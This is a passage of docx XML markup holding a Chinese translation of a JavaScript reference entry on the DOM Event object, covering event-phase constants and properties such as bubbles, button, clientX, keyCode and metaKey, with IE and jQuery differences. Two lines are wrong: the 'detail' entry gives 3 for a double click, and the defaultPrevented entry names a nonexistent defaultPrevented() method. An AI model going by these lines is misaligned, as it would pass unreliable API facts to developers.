      <w:r>
        <w:t>。其他新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>相关的事件类型没有定义专有的事件对象类型</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>与这些事件相关的对象只是一个普通的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象。本页归档这个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>普通</w:t>
      </w:r>
      <w:r>
        <w:t>”Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象加上它的一些子类型的属性。下面带星号的属性是由</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>类型自己定义的，这些属性继承自</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>等事件类型，一般为简单的、普通的事件，如</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件和</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象的播放事件定义这些属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些常量定义</w:t>
      </w:r>
      <w:r>
        <w:t>eventPhase</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>的值。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型不支持这个属性以及这些常量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short CAPTURING_PHASE=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件正分发给它的目标的祖先的捕获事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short AT_TARGET=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件正在它的目标上分发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short BUBBLING_PHASE=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件正在冒泡，同时正在它的目标的祖先上分发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿列出的属性是由标准事件模型定义的，适用于</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，也适用于鼠标及键盘相关的事件对象。这儿也列出了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型的属性。带星号的属性是由</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>直接定义的，在任何标准</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象上总是可用的，无论这个事件是什么类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean altKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件发生时</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>键是否按下。适用于鼠标、键盘事件以及</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean bubbles*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果事件会冒泡（除非调用</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>）则此属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>未定义这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly unsigned short button</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一个</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件中，哪个鼠标按键改变了状态。值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>表示左键，值为</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>表示右键，值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>表示鼠标的中键。注意，这个属性在按键改变状态时定义，所以，例如，不可用于报告在一个</w:t>
      </w:r>
      <w:r>
        <w:t>mousemove</w:t>
      </w:r>
      <w:r>
        <w:t>事件中某个按键是否一直按下。同时，这个属性也不是一个位图：它不能告诉你除一个键按下之外的更多信息。最后，有些浏览器只生成左键点击的事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件定义一个不兼容的</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，这个属性是一个位掩码</w:t>
      </w:r>
      <w:r>
        <w:t>：如果左键按下则</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>位被设置，右键按下则</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>位被设置，（三键鼠标的）中键按下则</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位被设置。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>没有模拟</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的标准</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但参考了</w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean cancelable*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果事件的默认操作可以用</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>来取消则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。所有标准事件类型都定义了这个属性，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean cancelBubble</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型中，如果一个事件处理程序想阻止一个事件向上冒泡到包含它的对象，必须设置这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。对于</w:t>
      </w:r>
      <w:r>
        <w:t>标准事件使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>stopPropagation()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly integer charCode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于按键事件，这个属性的值为引发事件的可打印字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码。对于不可打印的功能键来说，这个属性的值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，同时，这个属性不适用于</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
      <w:r>
        <w:t>来将这个值转为字符。在大多数浏览器中，发生按键事件时</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>的值和这个属性的值一样。但在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中，按键事件没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>，必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>charCode</w:t>
      </w:r>
      <w:r>
        <w:t>。这个事件不是标准</w:t>
      </w:r>
      <w:r>
        <w:t>事件，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件中未定义，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>也没有对其进行模拟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long clientX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long clientY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>鼠标相对于客户端区域（</w:t>
      </w:r>
      <w:r>
        <w:t>client area</w:t>
      </w:r>
      <w:r>
        <w:t>）或浏览器窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。注意，这两个坐标没有包含文档滚动条滚动的值；如果一个事件在窗口的最上方发生，无论文档上方已经滚动了多少，</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>的值都将是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。这两个属性适用于所有类型的鼠标事件。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件和标准事件中都定义了这两个属性。也可参考</w:t>
      </w:r>
      <w:r>
        <w:t>pageX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pageY</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean ctrlKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件发生时</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r>
        <w:t>键是否按下。适用于鼠标和键盘事件，也适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly EventTarget currentTarget*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前正在处理这个事件的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>。在捕获或冒泡阶段，它和</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>不一致。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件没有定义这个属性，不过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件模拟了这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DataTransfer dataTransfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于拖放事件，这个属性定义了协调整个拖放操作的</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象。拖放事件是一种鼠标事件；有这个属性的事件仍然</w:t>
      </w:r>
      <w:r>
        <w:t>会有</w:t>
      </w:r>
      <w:r>
        <w:t>clientX</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>clientY</w:t>
      </w:r>
      <w:r>
        <w:t>以及其他鼠标事件属性。拖放事件包括拖动源上的</w:t>
      </w:r>
      <w:r>
        <w:t>dragstart</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>drag</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dragend</w:t>
      </w:r>
      <w:r>
        <w:t>以及放置目标上的</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dragover</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dragleave</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>。关于拖放操作的更多细节，请参考</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean defaultPrevented*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在当前事件上调用</w:t>
      </w:r>
      <w:r>
        <w:t>defaultPrevented()</w:t>
      </w:r>
      <w:r>
        <w:t>则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。这是标准事件模型中一个新添加的属性，可能还不是所有浏览器都支持。（</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件定义一个功能类似于这个属性的</w:t>
      </w:r>
      <w:r>
        <w:t>isDefaultPrevented()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long detail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>与事件有关的一个数字细节。对</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>mousedown</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>mouseup</w:t>
      </w:r>
      <w:r>
        <w:t>事件来说，这个值是单击次数：单击为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，双击为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，三击为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，依此类推。在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件使用这个属性来报告鼠标滚轮滚过的数量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short eventPhase*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前事件传播的阶段。值为上面定义的三个常量之一。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件不支持这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean isTrusted*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前事件是由浏览器创建并分发的则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；如果是由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建并分发的人造事件则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性在标准事件模型中还是一个相对较新的属性，可能不是所有浏览器都已实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element fromElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mouseout</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
      <w:r>
        <w:t>fromElement</w:t>
      </w:r>
      <w:r>
        <w:t>指向鼠标指针正在其中移动的对象。标准事件中对应的是</w:t>
      </w:r>
      <w:r>
        <w:t>relatedTarget</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly integer </w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>按下的键的实际的键码。这个属性对所有类型的键盘事件都可用。键码可能会与浏览器、操作系统或者依赖的键盘硬件相关。一般情况下，显示一个可打印字符的键的实际的键码就是那个字符的编码。非打印字符的功能键的键码可能有很多种变化，可参见例</w:t>
      </w:r>
      <w:r>
        <w:t>17-8</w:t>
      </w:r>
      <w:r>
        <w:t>，其中包含一组常用的编码。这个属性尚未标准化，但所有浏览器（包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>）都定义了它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean metaKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件发生时</w:t>
      </w:r>
      <w:r>
        <w:t>Meta</w:t>
      </w:r>
      <w:r>
        <w:t>键是否按下。适用于鼠标和键盘事件，也包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
